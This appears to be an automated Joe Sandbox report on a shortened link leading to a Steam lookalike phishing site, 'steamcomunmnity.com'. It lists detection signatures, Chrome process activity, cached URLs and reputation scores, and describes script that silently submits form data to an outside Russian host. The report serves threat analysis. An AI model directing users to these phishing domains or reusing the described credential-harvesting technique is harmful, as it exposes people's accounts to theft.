Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://surl.pk/rUrcX

Overview

General Information

Sample URL:http://surl.pk/rUrcX
Analysis ID:1447586
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious javascript
HTML body contains password input but no form action
HTML title does not match URL
Program does not show much activity (idle)
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3112 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://surl.pk/rUrcX" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://surl.pk/rUrcXAvira URL Cloud: detection malicious, Label: phishing
Source: http://surl.pk/rUrcXVirustotal: Detection: 17%Perma Link

Phishing

barindex
Source: https://steamcomunmnity.com/app/1644413/STALKER_2_Heart_of_ChornobylLLM: Score: 9 Reasons: The code creates an iframe and form elements dynamically, sets their attributes, and submits the form to a potentially suspicious URL ('https://en.stetrade.ru/'). This behavior is indicative of phishing or other malicious activities as it attempts to gather and send data without user consent. DOM: 0.0.pages.csv
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: Title: Sign In does not match URL
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: <input type="password" .../> found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="author".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="author".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="author".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="author".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="copyright".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="copyright".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="copyright".. found
Source: https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerHTTP Parser: No <meta name="copyright".. found
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: var youtubeurl = location.protocol + '//www.youtube.com/embed/' + videoid + '?showinfo=0&autohide=1&fs=1&hd=1&modestbranding=1&rel=0&showsearch=0&wmode=direct&autoplay=1'; equals www.youtube.com (Youtube)
Source: chromecache_786.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: chromecache_786.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: chromecache_818.2.drString found in binary or memory: http://colorzilla.com/gradient-editor/#223246
Source: chromecache_786.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: chromecache_786.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: chromecache_786.2.drString found in binary or memory: http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia
Source: chromecache_786.2.drString found in binary or memory: http://ocsp.digicert.com0A
Source: chromecache_786.2.drString found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_786.2.drString found in binary or memory: http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl07
Source: chromecache_786.2.drString found in binary or memory: http://pki-ocsp.symauth.com0
Source: chromecache_768.2.dr, chromecache_586.2.dr, chromecache_574.2.dr, chromecache_552.2.dr, chromecache_730.2.dr, chromecache_711.2.dr, chromecache_831.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/.
Source: chromecache_665.2.drString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://checkout.steampowered.com/parental/ajaxlock
Source: chromecache_437.2.drString found in binary or memory: https://community.akamai.steamstatic.com/
Source: chromecache_510.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: chromecache_437.2.drString found in binary or memory: https://help.steampowered.com/en/wizard/HelpWithLimitedAccount
Source: chromecache_510.2.drString found in binary or memory: https://help.steampowered.com/ru/wizard/HelpWithLimitedAccount
Source: chromecache_605.2.dr, chromecache_514.2.dr, chromecache_439.2.dr, chromecache_738.2.dr, chromecache_410.2.drString found in binary or memory: https://plau.cohttps://plau.co
Source: chromecache_605.2.dr, chromecache_514.2.dr, chromecache_439.2.dr, chromecache_738.2.dr, chromecache_410.2.drString found in binary or memory: https://plau.cohttps://plau.coCopyright
Source: chromecache_605.2.dr, chromecache_514.2.dr, chromecache_439.2.drString found in binary or memory: https://plau.cohttps://plau.coMotiva
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://player.vimeo.com/video/
Source: chromecache_898.2.drString found in binary or memory: https://shared.akamai.steamstatic.com/store_item_assets/steam/
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://sketchfab.com/models/
Source: chromecache_574.2.dr, chromecache_552.2.drString found in binary or memory: https://steam.tv
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://steam.tv/parental/ajaxlock
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://steamcommunity.com
Source: chromecache_437.2.drString found in binary or memory: https://steamcommunity.com/
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://steamcommunity.com/chat/
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://steamcommunity.com/chat/friend/
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://steamcommunity.com/chat/group/
Source: chromecache_898.2.drString found in binary or memory: https://store.akamai.steamstatic.com/public/images/promo/lunar2019/lny2019_title_en.png
Source: chromecache_804.2.drString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/blank.gif
Source: chromecache_381.2.drString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/login/throbber.gif
Source: chromecache_665.2.drString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/promo/lunar2019/lny2019_title_ru.png
Source: chromecache_804.2.drString found in binary or memory: https://store.cloudflare.steamstatic.com/public/images/v5/ico_external_link.gif
Source: chromecache_437.2.drString found in binary or memory: https://store.steampowered.com/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com//login?redir=app/
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://store.steampowered.com/about/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/account/languagepreferences/
Source: chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/account/preferences
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/account/setlanguage/
Source: chromecache_534.2.dr, chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/api/addtowishlist
Source: chromecache_534.2.dr, chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/api/removefromwishlist
Source: chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/app/
Source: chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/bundle/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/cart/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/curators/ajaxfollow
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/curators/ajaxignore
Source: chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/dynamicstore/saledata/?cc=
Source: chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/dynamicstore/userdata/?id=
Source: chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/explore/howitworks/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/freelicense/addfreebundle/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/freelicense/addfreelicense/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/friends/recommendgame
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/gotflash
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/logout/
Source: chromecache_534.2.dr, chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/recommended/ignorerecommendation/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/search/?term=
Source: chromecache_510.2.dr, chromecache_437.2.drString found in binary or memory: https://store.steampowered.com/search/results/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/search/smallcapscroll
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/search/suggest
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/search/tab
Source: chromecache_898.2.dr, chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/sub/
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/tag/en/
Source: chromecache_381.2.drString found in binary or memory: https://store.steampowered.com/tagdata/gettaggames/
Source: chromecache_381.2.drString found in binary or memory: https://store.steampowered.com/tagdata/myfrequenttags
Source: chromecache_381.2.drString found in binary or memory: https://store.steampowered.com/tagdata/populartags/russian
Source: chromecache_534.2.drString found in binary or memory: https://store.steampowered.com/tagdata/recommendedtags
Source: chromecache_381.2.drString found in binary or memory: https://store.steampowered.com/tagdata/tagapp
Source: chromecache_381.2.drString found in binary or memory: https://store.steampowered.com/tags/
Source: chromecache_898.2.drString found in binary or memory: https://store.steampowered.com/tags/en/
Source: chromecache_665.2.drString found in binary or memory: https://store.steampowered.com/tags/ru/
Source: classification engineClassification label: mal60.phis.win@26/903@0/31
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://surl.pk/rUrcX"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3112 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3112 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://surl.pk/rUrcX100%Avira URL Cloudphishing
http://surl.pk/rUrcX18%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://store.steampowered.com/0%URL Reputationsafe
https://player.vimeo.com/video/0%URL Reputationsafe
https://community.akamai.steamstatic.com/0%URL Reputationsafe
https://store.steampowered.com/dynamicstore/userdata/?id=0%URL Reputationsafe
https://store.steampowered.com/dynamicstore/userdata/?id=0%URL Reputationsafe
https://store.steampowered.com/cart/0%URL Reputationsafe
https://store.steampowered.com/tagdata/recommendedtags0%URL Reputationsafe
https://steam.tv0%URL Reputationsafe
https://store.steampowered.com/search/smallcapscroll0%URL Reputationsafe
https://cdn.cloudflare.steamstatic.com/steam/0%URL Reputationsafe
https://store.steampowered.com/freelicense/addfreelicense/0%URL Reputationsafe
https://store.steampowered.com/friends/recommendgame0%URL Reputationsafe
http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia0%URL Reputationsafe
https://store.steampowered.com/account/setlanguage/0%URL Reputationsafe
http://pki-ocsp.symauth.com00%URL Reputationsafe
https://store.steampowered.com/bundle/0%URL Reputationsafe
https://store.steampowered.com/about/0%URL Reputationsafe
https://community.cloudflare.steamstatic.com/0%URL Reputationsafe
https://shared.akamai.steamstatic.com/store_item_assets/steam/0%Avira URL Cloudsafe
https://store.steampowered.com/curators/ajaxignore0%Avira URL Cloudsafe
https://store.steampowered.com/tags/ru/0%Avira URL Cloudsafe
https://steamcommunity.com/chat/group/0%Avira URL Cloudsafe
https://help.steampowered.com/en/wizard/HelpWithLimitedAccount0%Avira URL Cloudsafe
https://store.steampowered.com/sub/0%Avira URL Cloudsafe
https://store.steampowered.com/tagdata/tagapp0%Avira URL Cloudsafe
https://store.steampowered.com/api/removefromwishlist0%Avira URL Cloudsafe
https://steamcommunity.com/chat/group/0%VirustotalBrowse
https://store.steampowered.com/logout/0%Avira URL Cloudsafe
https://help.steampowered.com/en/wizard/HelpWithLimitedAccount0%VirustotalBrowse
https://store.steampowered.com/sub/0%VirustotalBrowse
https://store.steampowered.com/gotflash0%Avira URL Cloudsafe
https://store.steampowered.com/account/preferences0%Avira URL Cloudsafe
https://sketchfab.com/models/0%Avira URL Cloudsafe
https://steamcommunity.com/chat/friend/0%Avira URL Cloudsafe
https://store.steampowered.com/api/removefromwishlist0%VirustotalBrowse
https://store.steampowered.com/curators/ajaxignore0%VirustotalBrowse
https://store.steampowered.com/gotflash0%VirustotalBrowse
https://help.steampowered.com/ru/wizard/HelpWithLimitedAccount0%VirustotalBrowse
https://store.steampowered.com/logout/0%VirustotalBrowse
https://steamcommunity.com/chat/friend/0%VirustotalBrowse
https://sketchfab.com/models/0%VirustotalBrowse
https://store.steampowered.com/tagdata/tagapp0%VirustotalBrowse
https://store.steampowered.com/account/preferences0%VirustotalBrowse
https://store.steampowered.com/tags/ru/0%VirustotalBrowse
http://colorzilla.com/gradient-editor/#2232460%VirustotalBrowse
http://colorzilla.com/gradient-editor/#2232460%Avira URL Cloudsafe
https://help.steampowered.com/ru/wizard/HelpWithLimitedAccount0%Avira URL Cloudsafe
https://store.steampowered.com/search/tab0%Avira URL Cloudsafe
http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl070%Avira URL Cloudsafe
https://plau.cohttps://plau.coCopyright0%Avira URL Cloudsafe
https://steamcommunity.com/chat/0%Avira URL Cloudsafe
https://store.steampowered.com/search/tab0%VirustotalBrowse
https://store.steampowered.com/search/results/0%Avira URL Cloudsafe
https://store.steampowered.com/tag/en/0%Avira URL Cloudsafe
https://store.akamai.steamstatic.com/public/images/promo/lunar2019/lny2019_title_en.png0%Avira URL Cloudsafe
https://store.cloudflare.steamstatic.com/public/images/v5/ico_external_link.gif0%Avira URL Cloudsafe
https://plau.cohttps://plau.co0%Avira URL Cloudsafe
https://steamcommunity.com/chat/0%VirustotalBrowse
https://store.cloudflare.steamstatic.com/public/images/blank.gif0%Avira URL Cloudsafe
https://store.steampowered.com/search/?term=0%Avira URL Cloudsafe
https://store.cloudflare.steamstatic.com/public/images/v5/ico_external_link.gif0%VirustotalBrowse
https://steamcommunity.com0%Avira URL Cloudsafe
https://store.steampowered.com/tag/en/0%VirustotalBrowse
http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl070%VirustotalBrowse
https://store.steampowered.com/search/results/0%VirustotalBrowse
https://store.steampowered.com/account/languagepreferences/0%Avira URL Cloudsafe
https://store.steampowered.com/freelicense/addfreebundle/0%Avira URL Cloudsafe
https://store.steampowered.com/app/0%Avira URL Cloudsafe
https://store.steampowered.com/tags/en/0%Avira URL Cloudsafe
https://store.steampowered.com/recommended/ignorerecommendation/0%Avira URL Cloudsafe
https://store.steampowered.com/search/?term=0%VirustotalBrowse
https://store.cloudflare.steamstatic.com/public/images/blank.gif0%VirustotalBrowse
https://store.steampowered.com/app/0%VirustotalBrowse
https://store.steampowered.com/tagdata/gettaggames/0%Avira URL Cloudsafe
https://store.cloudflare.steamstatic.com/public/images/promo/lunar2019/lny2019_title_ru.png0%Avira URL Cloudsafe
https://store.steampowered.com/tags/en/0%VirustotalBrowse
https://store.steampowered.com/tags/0%Avira URL Cloudsafe
https://store.steampowered.com/recommended/ignorerecommendation/0%VirustotalBrowse
https://store.steampowered.com/freelicense/addfreebundle/0%VirustotalBrowse
https://store.steampowered.com/dynamicstore/saledata/?cc=0%Avira URL Cloudsafe
https://store.steampowered.com/tagdata/gettaggames/0%VirustotalBrowse
https://store.akamai.steamstatic.com/public/images/promo/lunar2019/lny2019_title_en.png0%VirustotalBrowse
https://store.cloudflare.steamstatic.com/public/images/login/throbber.gif0%Avira URL Cloudsafe
https://store.steampowered.com/account/languagepreferences/0%VirustotalBrowse
https://steam.tv/parental/ajaxlock0%Avira URL Cloudsafe
https://store.steampowered.com/tagdata/populartags/russian0%Avira URL Cloudsafe
https://store.steampowered.com/curators/ajaxfollow0%Avira URL Cloudsafe
https://checkout.steampowered.com/parental/ajaxlock0%Avira URL Cloudsafe
https://store.steampowered.com/search/suggest0%Avira URL Cloudsafe
https://steam.tv/parental/ajaxlock0%VirustotalBrowse
https://store.steampowered.com//login?redir=app/0%Avira URL Cloudsafe
https://store.steampowered.com/tagdata/myfrequenttags0%Avira URL Cloudsafe
https://steamcommunity.com/0%Avira URL Cloudsafe
https://store.steampowered.com/tags/0%VirustotalBrowse
http://store.steampowered.com/subscriber_agreement/.0%Avira URL Cloudsafe
https://store.steampowered.com/api/addtowishlist0%Avira URL Cloudsafe
https://plau.cohttps://plau.coMotiva0%Avira URL Cloudsafe
https://store.steampowered.com/curators/ajaxfollow0%VirustotalBrowse
https://store.steampowered.com/dynamicstore/saledata/?cc=0%VirustotalBrowse
https://steamcommunity.com0%VirustotalBrowse
No contacted domains info
NameMaliciousAntivirus DetectionReputation
https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-headerfalse
    unknown
    https://steamcomunmnity.com/app/1644413/STALKER_2_Heart_of_Chornobyltrue
      unknown
      https://store.steampowered.com/false
      • URL Reputation: safe
      unknown
      https://steamcomunmnity.com/xmfrd2fdkr/false
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://steamcommunity.com/chat/group/chromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tags/ru/chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://shared.akamai.steamstatic.com/store_item_assets/steam/chromecache_898.2.drfalse
        • Avira URL Cloud: safe
        unknown
        https://player.vimeo.com/video/chromecache_510.2.dr, chromecache_437.2.drfalse
        • URL Reputation: safe
        unknown
        https://community.akamai.steamstatic.com/chromecache_437.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/dynamicstore/userdata/?id=chromecache_898.2.dr, chromecache_665.2.drfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://help.steampowered.com/en/wizard/HelpWithLimitedAccountchromecache_437.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/curators/ajaxignorechromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/sub/chromecache_898.2.dr, chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tagdata/tagappchromecache_381.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/api/removefromwishlistchromecache_534.2.dr, chromecache_898.2.dr, chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/cart/chromecache_534.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/logout/chromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/tagdata/recommendedtagschromecache_534.2.drfalse
        • URL Reputation: safe
        unknown
        https://steam.tvchromecache_574.2.dr, chromecache_552.2.drfalse
        • URL Reputation: safe
        unknown
        https://store.steampowered.com/gotflashchromecache_534.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://store.steampowered.com/account/preferenceschromecache_898.2.dr, chromecache_665.2.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://sketchfab.com/models/chromecache_510.2.dr, chromecache_437.2.drfalse
        • 0%, Virustotal, Browse
